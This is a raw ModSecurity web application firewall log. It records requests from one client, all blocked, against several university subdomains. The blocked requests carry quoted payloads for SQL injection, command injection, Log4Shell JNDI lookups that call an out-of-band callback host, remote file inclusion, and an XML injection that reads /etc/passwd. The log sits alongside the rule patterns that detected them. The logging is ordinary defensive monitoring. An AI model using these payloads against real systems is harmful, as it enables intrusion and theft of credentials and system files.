[Tue Aug 29 11:32:08.309905 2023] [:error] [pid 893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:account_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:account_id: 2'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/dms/admin/accounts/payment_history.php"] [unique_id "ZO10yMCo-f0AAAN9sSYAAAAJ"]
[Tue Aug 29 11:32:08.310038 2023] [:error] [pid 1045] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:account_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:account_id: 2'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/dms/admin/accounts/payment_history.php"] [unique_id "ZO10yMCo-f0AAAQV4TUAAAA3"]
[Tue Aug 29 11:32:08.323703 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:cfg_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:cfg_id: ;id;#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ajax/openvpn/del_ovpncfg.php"] [unique_id "ZO10yMCo-f0AAAPiBqMAAAAB"]
[Tue Aug 29 11:32:08.331040 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:account_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:account_id: 2'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/dms/admin/accounts/payment_history.php"] [unique_id "ZO10yMCo-f0AAAP@M5EAAAAZ"]
[Tue Aug 29 11:32:08.348647 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:cfg_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:cfg_id: ;id;#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/ajax/openvpn/del_ovpncfg.php"] [unique_id "ZO10yMCo-f0AAAQKOecAAAAs"]
[Tue Aug 29 11:32:08.370866 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:cfg_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:cfg_id: ;id;#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/ajax/openvpn/del_ovpncfg.php"] [unique_id "ZO10yMCo-f0AAAP@M5MAAAAZ"]
[Tue Aug 29 11:32:08.389198 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:cfg_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:cfg_id: ;id;#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/ajax/openvpn/del_ovpncfg.php"] [unique_id "ZO10yMCo-f0AAAQKOekAAAAs"]
[Tue Aug 29 11:32:08.392157 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:cfg_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:cfg_id: ;id;#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/ajax/openvpn/del_ovpncfg.php"] [unique_id "ZO10yMCo-f0AAAP5mO0AAAAM"]
[Tue Aug 29 11:32:08.411791 2023] [:error] [pid 1044] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:cfg_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:cfg_id: ;id;#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/ajax/openvpn/del_ovpncfg.php"] [unique_id "ZO10yMCo-f0AAAQUIBYAAAA2"]
[Tue Aug 29 11:32:10.359591 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:action. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:action: ${jndi:ldap://${:-738}${:-475}}.${hostName}.uri.cjmn8l5jmimk2adbbnlgfms5kqyctd45g.oast.site/}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/solr/admin/collections"] [unique_id "ZO10ysCo-f0AAAQKOfEAAAAs"]
[Tue Aug 29 11:32:10.362597 2023] [:error] [pid 1044] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:action. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:action: ${jndi:ldap://${:-738}${:-475}}.${hostName}.uri.cjmn8l5jmimk2adbbnlgmbi8x4crefz8m.oast.site/}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/solr/admin/collections"] [unique_id "ZO10ysCo-f0AAAQUIBoAAAA2"]
[Tue Aug 29 11:32:10.362932 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:action. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:action: ${jndi:ldap://${:-738}${:-475}}.${hostName}.uri.cjmn8l5jmimk2adbbnlgjzpkfwewdpfsj.oast.site/}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/solr/admin/collections"] [unique_id "ZO10ysCo-f0AAAQnF8IAAAAF"]
[Tue Aug 29 11:32:10.364098 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:action. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:action: ${jndi:ldap://${:-738}${:-475}}.${hostName}.uri.cjmn8l5jmimk2adbbnlgnpngzn6n53h85.oast.site/}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/solr/admin/collections"] [unique_id "ZO10ysCo-f0AAAP5mPIAAAAM"]
[Tue Aug 29 11:32:10.376830 2023] [:error] [pid 854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:action. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:action: ${jndi:ldap://${:-738}${:-475}}.${hostName}.uri.cjmn8l5jmimk2adbbnlg5tbak93k5ajzb.oast.site/}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/solr/admin/collections"] [unique_id "ZO10ysCo-f0AAANWgXsAAAAG"]
[Tue Aug 29 11:32:10.436687 2023] [:error] [pid 854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:action. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:action: ${jndi:ldap://${:-738}${:-475}}.${hostName}.uri.cjmn8l5jmimk2adbbnlg1u7fnku6suo6b.oast.site/}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/solr/admin/collections"] [unique_id "ZO10ysCo-f0AAANWgX4AAAAG"]
[Tue Aug 29 11:32:10.444428 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:action. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:action: ${jndi:ldap://${:-738}${:-475}}.${hostName}.uri.cjmn8l5jmimk2adbbnlg5d9dw7rnog4bn.oast.site/}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/solr/admin/cores"] [unique_id "ZO10ysCo-f0AAAQnF8YAAAAF"]
[Tue Aug 29 11:32:10.445743 2023] [:error] [pid 1037] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:action. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:action: ${jndi:ldap://${:-738}${:-475}}.${hostName}.uri.cjmn8l5jmimk2adbbnlgts5iawhe1u49m.oast.site/}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/solr/admin/cores"] [unique_id "ZO10ysCo-f0AAAQNwNMAAAAv"]
[Tue Aug 29 11:32:10.450084 2023] [:error] [pid 893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:action. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:action: ${jndi:ldap://${:-738}${:-475}}.${hostName}.uri.cjmn8l5jmimk2adbbnlgkn9rdsrrypsce.oast.site/}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/solr/admin/cores"] [unique_id "ZO10ysCo-f0AAAN9sTAAAAAJ"]
[Tue Aug 29 11:32:10.452524 2023] [:error] [pid 1044] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:action. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:action: ${jndi:ldap://${:-738}${:-475}}.${hostName}.uri.cjmn8l5jmimk2adbbnlgijoiepf74mdcu.oast.site/}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/solr/admin/cores"] [unique_id "ZO10ysCo-f0AAAQUIB4AAAA2"]
[Tue Aug 29 11:32:11.307257 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:action. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:action: ${jndi:ldap://${:-738}${:-475}}.${hostName}.uri.cjmn8l5jmimk2adbbnlgprcibuiufytqu.oast.site/}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/solr/admin/cores"] [unique_id "ZO10y8Co-f0AAANsAZIAAAAD"]
[Tue Aug 29 11:32:11.317406 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:action. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:action: ${jndi:ldap://${:-738}${:-475}}.${hostName}.uri.cjmn8l5jmimk2adbbnlg7iefnqywoeeg6.oast.site/}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/solr/admin/cores"] [unique_id "ZO10y8Co-f0AAAQMr0AAAAAu"]
[Tue Aug 29 11:32:12.348218 2023] [:error] [pid 1085] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS_NAMES:ids[0,updatexml(0,concat(0xa,user()),0)]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS_NAMES:ids[0,updatexml(0,concat(0xa,user()),0)]: ids[0,updatexml(0,concat(0xa,user()),0)]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10zMCo-f0AAAQ9H0EAAAAK"]
[Tue Aug 29 11:32:12.360803 2023] [:error] [pid 854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS_NAMES:ids[0,updatexml(0,concat(0xa,user()),0)]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS_NAMES:ids[0,updatexml(0,concat(0xa,user()),0)]: ids[0,updatexml(0,concat(0xa,user()),0)]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10zMCo-f0AAANWgYMAAAAG"]
[Tue Aug 29 11:32:12.378951 2023] [:error] [pid 1084] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS_NAMES:ids[0,updatexml(0,concat(0xa,user()),0)]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS_NAMES:ids[0,updatexml(0,concat(0xa,user()),0)]: ids[0,updatexml(0,concat(0xa,user()),0)]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10zMCo-f0AAAQ83QwAAAAI"]
[Tue Aug 29 11:32:12.386222 2023] [:error] [pid 1044] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS_NAMES:ids[0,updatexml(0,concat(0xa,user()),0)]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS_NAMES:ids[0,updatexml(0,concat(0xa,user()),0)]: ids[0,updatexml(0,concat(0xa,user()),0)]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10zMCo-f0AAAQUICQAAAA2"]
[Tue Aug 29 11:32:12.402995 2023] [:error] [pid 893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS_NAMES:ids[0,updatexml(0,concat(0xa,user()),0)]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS_NAMES:ids[0,updatexml(0,concat(0xa,user()),0)]: ids[0,updatexml(0,concat(0xa,user()),0)]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10zMCo-f0AAAN9sTgAAAAJ"]
[Tue Aug 29 11:32:12.417021 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS_NAMES:ids[0,updatexml(0,concat(0xa,user()),0)]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS_NAMES:ids[0,updatexml(0,concat(0xa,user()),0)]: ids[0,updatexml(0,concat(0xa,user()),0)]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO10zMCo-f0AAAQnF8oAAAAF"]
[Tue Aug 29 11:32:13.311733 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlg3uxw8sqidb61a.oast.site found within TX:1: cjmn8l5jmimk2adbbnlg3uxw8sqidb61a.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10zcCo-f0AAAPDoCwAAAAP"]
[Tue Aug 29 11:32:13.311817 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:<?xml version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22?>< found within ARGS:<?xml version: \\x221.0\\x22 encoding=\\x22UTF-8\\x22?><language>$(cat /etc/passwd>webLib/x)</language>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/SDK/webLanguage"] [unique_id "ZO10zcCo-f0AAAQnF8sAAAAF"]
[Tue Aug 29 11:32:13.313405 2023] [:error] [pid 1045] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:<?xml version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22?>< found within ARGS:<?xml version: \\x221.0\\x22 encoding=\\x22UTF-8\\x22?><language>$(cat /etc/passwd>webLib/x)</language>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/SDK/webLanguage"] [unique_id "ZO10zcCo-f0AAAQV4UYAAAA3"]
